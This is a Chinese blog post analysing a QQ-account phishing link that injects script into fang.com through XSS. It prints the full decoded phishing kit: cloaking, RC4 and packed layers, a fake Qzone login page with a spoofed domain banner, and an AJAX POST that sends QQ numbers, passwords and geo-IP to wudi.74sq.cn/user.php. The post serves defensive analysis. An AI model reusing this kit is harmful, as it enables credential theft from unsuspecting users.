记网友 QQ 被盗群发的套路链接
又看见一个骗子,趁机水一篇。
如题,这个套路消息是这样的:「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你?/微笑」——用的是腾讯自家的 url.cn 短链服务,域名本身看起来就很可信。
用移动设备打开,显示的是一个仿冒的 QQ 空间登录页面,要求输入帐号密码,从而盗取 QQ 帐号。
这个短网址先跳转到一个本身无害的正规网站(fz.fang.com)的搜索页,利用该页面的 XSS 漏洞注入脚本——骗子用的标签名字就叫 xss,毫不掩饰。黑人问号.jpg
骗子注入了一个 `<script>`,src 指向 wudi.74sq.cn/404.php(文件名装成 404 页面?)。
本来用电脑 curl 之,发现这个 js 只是直接跳转到腾讯网(`window.location.href = "http://www.qq.com";`)——也就是按 User-Agent 做了区分(cloaking),桌面浏览器和爬虫看到的是无害内容,分析时必须带移动端 UA。
于是带上手机的 UA 再 curl,才拿到真正的载荷:
// Stage 1 of the dropper served by wudi.74sq.cn/404.php (mobile user agents only):
// wipes the page the XSS landed on and replaces it with attacker-controlled HTML.
// The HTML is merely percent-encoded (unescape); its decoded form is listed below.
(function () {
// Legacy document.open(type, "replace") opens a fresh document for writing
// (historically the "replace" flag also replaced the current history entry).
var new_doc = document.open("text/html", "replace");
// Decoded, this markup carries a <script> that RC4-decrypts (arcfour, key
// "36a9dc5d29d54b46793d0c682298dbab") a base64 blob and document.write()s the result.
var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%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%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
new_doc.write(html);
new_doc.close();
})();
// Runs after the document has been replaced above: injects a hidden iframe pointing
// at Baidu's favicon, removes it 9 ms after it loads, and blanks the tab title.
// NOTE(review): the purpose of the throwaway iframe is not evident from the code
// (possibly a history/URL-bar trick or a load-time beacon) — unconfirmed.
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
setTimeout(function () {
set.remove();
}, 9)
}
// Blank the tab title.
document.title = '';
document.body.appendChild(set);
// Helpers used by the stage-2 HTML: byte-string base64 encode/decode and an RC4
// ("arcfour") implementation — the standard 256-byte KSA followed by PRGA, XORed over
// the input treated as a binary string (charCodeAt/fromCharCode). The RC4 plaintext is
// percent-encoded, which is why the caller wraps the result in decodeURIComponent().
// NOTE(review): arcfour() leaks `s`, `l` and `y` as implicit globals (`s=new Array()`,
// `l=k.length`, and `var i=j=y=0` declares only `i`); base64_encode is unused in the
// visible code. All three are left exactly as captured — they are part of the sample.
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}
把 unescape 运行一下,得到
<!-- Stage 2: the page written by the dropper's unescape() above. -->
<html>
<head>
<!-- referrer "always" is the legacy value meaning: always send the full Referer. -->
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<script type="text/javascript">
// RC4-decrypt the base64 blob with the hard-coded key and write the plaintext as HTML.
// arcfour()/base64_decode() are the helpers from the dropper script; the blob itself is
// truncated in this listing.
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("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"))));
</script>
</head>
<body>
</body>
</html>
还要套,套这么多层
<!-- Stage 3 (RC4 plaintext): loads jQuery from Baidu's public CDN, then on DOM ready
     fetches and executes yet another remote script (login.js) via $.getScript. -->
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
// $(fn) is jQuery's DOM-ready wrapper; $.getScript GETs the URL and evaluates the body.
$(function(){
$.getScript('http://wudi.74sq.cn/template/login.js');
});
</script>
外面套的 $() 是 jQuery 的 DOM ready 包装,里面用 $.getScript 去加载并执行 http://wudi.74sq.cn/template/login.js——就是它没错了。
login.js 又套了一层:它往 document 里 write 了一段包含 js 的 html。再解一层,终于出现真身:
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<!-- Mobile viewport settings (no user scaling), matching the in-app QQ browser target. -->
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<!-- jQuery again (Baidu CDN), plus Tencent's genuine mobile QQ JS SDK (mqq.*), which the
     script below uses to dress the in-app title bar. -->
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<!-- The real Qzone mobile login stylesheet, hotlinked from Tencent's CDN: the clone looks
     right because it reuses the original CSS. Only css.css is attacker-hosted. -->
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!-- top banner -->
</head>
<script type="text/javascript">
// Writes a 30-day cookie on the phishing origin; the value is escape()d.
function setCookie(name, value) {
var Days = 30;
var exp = new Date();
exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
}
// Reads a cookie by name via regex; returns 0 (not "") when it is absent.
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
if (arr = document.cookie.match(reg))
return unescape(arr[2]);
else
return 0;
}
// Revisit logic: once the "login" cookie exists (set after the credential POST in the
// click handler at the bottom of the page), the victim is bounced straight to the real
// Qzone profile, so the fake login form is never shown twice to the same browser.
if (getCookie("login")){
window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me';//second-hop redirect target
}
// Uses the genuine mqq SDK loaded in <head>: left title button labelled "相册"
// ("Albums") with a no-op callback, right button hidden.
$(function(){
mqq.ui.setTitleButtons({
left : {
title : "相册",
callback : function () {
}
},
right : {
hidden: true
}
})
});
</script>
<body style="zoom: 1;">
<script>
// Packed in the standard p,a,c,k,e,r format (eval(function(p,a,c,k,e,r){...})).
// Unpacked (token table is the last argument), it does three things:
//  1. Fakes the in-app QQ browser's pull-down domain banner: on touchstart/touchmove with
//     scrollTop <= 0 it prepends a #_domain_display div reading
//     "网页由 ui.ptlogin2.qq.com 提供" / "QQ浏览器X5内核提供技术支持" and grows it with the
//     drag distance; touchend slides it away. A victim who "checks the domain" the way
//     the QQ client teaches sees Tencent's login host.
//  2. Cloaking: if navigator.platform starts with "Win" or "Mac", or the user agent does
//     not contain "QQ/", redirects to http://qzone.qq.com. (The X11/Linux result is
//     stored as system.x11 but tested as system.xll, so that flag never fires.)
//  3. Fills the hidden #ip input with remote_ip_info.province + city, supplied by the
//     sina iplookup script inside the form.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{}))
</script>
<div id="content" class="content">
<div id="error_tips">
<div id="error_tips_content">
<span id="error_icon"></span>
<span id="error_message"></span>
</div>
</div>
<div id="login" class="login">
<div id="logo" class="logo">
</div>
<div id="app_name" style="display: none">
</div>
<div id="q_login" class="q_login" style="display: none">
<div id="q_login_title">
<div id="q_login_logo">
</div>
<label id="q_login_tips"></label>
</div>
<div id="q_logon_list" class="q_logon_list">
</div>
</div>
<div id="web_login">
<!-- The form never submits natively (empty action/method, and the "登 录" control is a
     div), so credentials only leave via the AJAX POST in the script at the bottom. -->
<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
<!-- Third-party geo-IP lookup over plain http, placed inside the form; it presumably
     defines remote_ip_info, which the packed script copies into the hidden #ip field so
     the operator receives the victim's province/city alongside each credential. -->
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
<input type="hidden" name="ip" id="ip"/>
<ul id="g_list">
<li id="g_u">
<div id="del_touch" class="del_touch">
<span id="del_u" class="del_u"></span>
</div>
<!-- Field names are random strings (no "user"/"pass" keywords), plausibly to dodge
     keyword-based content filters; they also serve as a fingerprint of this kit. -->
<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
<li id="g_p">
<div id="del_touch_p" class="del_touch">
<span id="del_p" class="del_u"></span>
</div>
<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
</ul>
<!-- A div, not a <button>: the click handler at the bottom validates and POSTs. -->
<div href="javascript:void(0);" id="go">登 录</div>
</form>
</div>
<div id="switch">
<!-- Hidden; pt._switch is not defined anywhere in the captured page. -->
<div id="swicth_login" onclick="pt._switch()" style="display: none">
</div>
<!-- Register / forgot-password links go to Tencent's real ptlogin2 endpoints, which
     makes the page look legitimate; the first URL is hex-escaped ("\x3A\x2F\x2F" = "://"). -->
<div id="zc_feedback">
<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span>
</div>
</div>
<div id="custom_bottom">
</div>
</div>
<div id="vcode">
<label id="vcode_tips"></label>
<div id="vcode_area">
<img id="vcode_img"/>
<label id="input_tips"></label>
<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
</div>
<div id="button">
</div>
</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
// Unused in the visible code.
var times = 0;
// Shows the error tip bar with msg and raises the (implicit-global) err flag.
// msg is always one of the fixed literals below, so .html() is not an injection sink here.
function error(msg) {
$("#error_tips").css({
display: 'block'
});
$('#error_message').html(msg);
err = true;
}
// Focusing any input hides the tip and clears the flag.
$('form input').focus(function() {
$("#error_tips").css({
display: 'none'
});
err = false;
});
$("#error_tips").on('click',
function() {
$(this).hide();
});
// Click handler for the "登 录" div: client-side validation, then exfiltration.
$("#go").on('click',
function() {
var $this = $(this);
err = false;
var p = $("#p").val();
var u = $("#u").val();
u == '' && error('您还没有输入帐号!');
if (err) return false;
p == '' && error("您还没有输入密码!");
if (err) return false;
// Only a 6–10 digit number not starting with 0 passes, although the placeholder
// also offers phone/e-mail: the kit wants QQ numbers specifically.
/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
if (err) return false;
// Password must be 6–16 characters (the input's maxlength is 16).
var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确,请重新输入。');
if (err) {
$("#p").val('');
return false;
}
if (!err){
// Exfiltration: POSTs the serialized form (ip + the two randomly named fields) to the
// operator's user.php via a protocol-relative URL. Only an error callback is defined:
// with dataType 'json', a non-JSON/empty reply or a failed request lands here, sets the
// "login" cookie (consumed by the redirect check in <head>) and bounces the victim to
// the real qzone.qq.com. There is no success handler, so a well-formed JSON reply would
// leave the page where it is — presumably user.php never returns one.
$.ajax({
url:'//wudi.74sq.cn/user.php',
type:'POST',
dataType:'json',
data: $('#loginform').serialize(),
error:function(er){
setCookie("login", "yes")
window.location.href='//qzone.qq.com';
}
})
}
})
</script>
<div style="display:none;">
</div>
</body>
</html>
伪装其实做得很细:页面直接复用腾讯自己的 login.css 和 mqq SDK;body 里那段 eval 打包的脚本解开后,会在下拉页面时伪造 QQ 内置浏览器的「网页由 ui.ptlogin2.qq.com 提供」域名提示条,并把桌面平台或 UA 里不含 QQ/ 的访客重定向到真正的 qzone.qq.com;还设置了「已登录」Cookie,防止用户再次点开时看到未登录状态而起疑心。
凭据通过 jQuery AJAX 以 POST 提交到 //wudi.74sq.cn/user.php(协议相对地址),数据格式:ip=省份城市&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码;其中 ip 字段由页面里加载的新浪 iplookup 脚本(若加载成功)按访客 IP 填成省份+城市。两个随机字段名也可以作为识别这套钓鱼模板的特征。
结束。